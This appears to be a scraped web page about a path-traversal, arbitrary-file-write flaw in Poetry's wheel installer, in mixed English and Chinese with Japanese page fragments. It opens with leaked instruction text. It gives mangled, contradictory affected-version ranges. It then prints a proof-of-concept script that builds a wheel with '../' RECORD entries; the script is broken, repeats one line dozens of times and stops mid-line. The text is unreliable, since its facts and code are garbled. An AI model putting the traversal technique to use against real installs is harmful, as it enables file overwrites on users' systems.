Poetry Wheel Path Traversal Leading to Arbitrary File Write

Based on the provided image, I need to extract and summarize the key information about the vulnerability in Chinese. 1. Vulnerability Overview (漏洞概述): Title: Wheel Path Traversal Leading to Arbitrary File Write (Wheel 路径遍历导致任意文件写入). Summary: A wheel file can contain files that Poetry uses without sufficient containment checks, allowing arbitrary file writes during the Poetry process. This is high severity because files can be reached from untrusted package archives during normal wheel building. Installing malicious wheels is sufficient for exploitation. Impact: Arbitrary file traversal from untrusted wheel content. Impacts macOS/Unix systems installing malicious or compromised packages. 2. Affected Versions (影响范围): Affected versions: >=1.0.0 and =1.0.0 且 =1.0.0 和 漏洞总结 漏洞标题: Wheel Path Traversal Leading to Arbitrary File Write (Wheel 路径遍历导致任意文件写入) 漏洞概述: 一个 wheel 文件可以包含 文件，Poetry 在使用这些文件时没有足够的包含检查，从而允许在 Poetry 过程中进行任意文件写入。这是一个高危漏洞，因为在正常的 wheel 构建过程中， 文件可以从不可信的包归档中访问。安装恶意 wheel 包足以利用此漏洞。 影响范围: 受影响版本: >=1.0.0 和 <2.3.2 修复版本: 2.3.3 影响: 允许从不可信的 wheel 内容进行任意文件遍历。影响安装恶意或受损包的 macOS/Unix 系统。 修复方案: 2.3.3 版本及更新版本的 Poetry 解析目标路径并确保它们位于目标目录内。否则，安装将被中止。 POC 代码:** ```python from pathlib import Path import zipfile, zipfile, sys from shutil import copyfile from poetry.installation.wheel_installer import WheelInstallation root = Path("/tmp/poetry_wheel_traversal") root.mkdir(exist_ok=True) wheel = Path("wheel-0.0.0-py3-none-any.whl") wheel.unlink(missing_ok=True) with zipfile.ZipFile(wheel, "w") as zf: zf.writestr("wheel-0.0.0.dist-info/WHEEL", b"Wheel-Version: 1.0\nGenerator: pytest now way\n") zf.writestr("wheel-0.0.0.dist-info/METADATA", b"Metadata-Version: 2.0\nName: wheel\nVersion: 0.0.0\n") zf.writestr("wheel-0.0.0.dist-info/RECORD", b"") files = [ Path("wheel-0.0.0.dist-info/RECORD"), Path("wheel-0.0.0.dist-info/WHEEL"), Path("wheel-0.0.0.dist-info/METADATA"), Path("wheel.pkl"), ] lines = [f"{f}:{f.stat().st_size}:{f.stat().st_mtime}\n" for f in files] + [f"../{f}:{f.stat().st_size}:{f.stat().st_mtime}\n" for f in files] with open("wheel-0.0.0.dist-info/RECORD", "w") as f: f.writelines(lines) with zipfile.ZipFile(wheel, "w") as zf: for f in files: zf.write(f, f"{f}") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf.writestr("wheel.pkl", b"wheel.pkl") with zipfile.ZipFile(wheel, "a") as zf: zf

目標達成すべての支援者に感謝 — 100%達成しました！

Poetry Wheel Path Traversal Leading to Arbitrary File Write

このソースからの他の記事

目標達成 すべての支援者に感謝 — 100%達成しました！

Poetry Wheel Path Traversal Leading to Arbitrary File Write

このソースからの他の記事

目標達成すべての支援者に感謝 — 100%達成しました！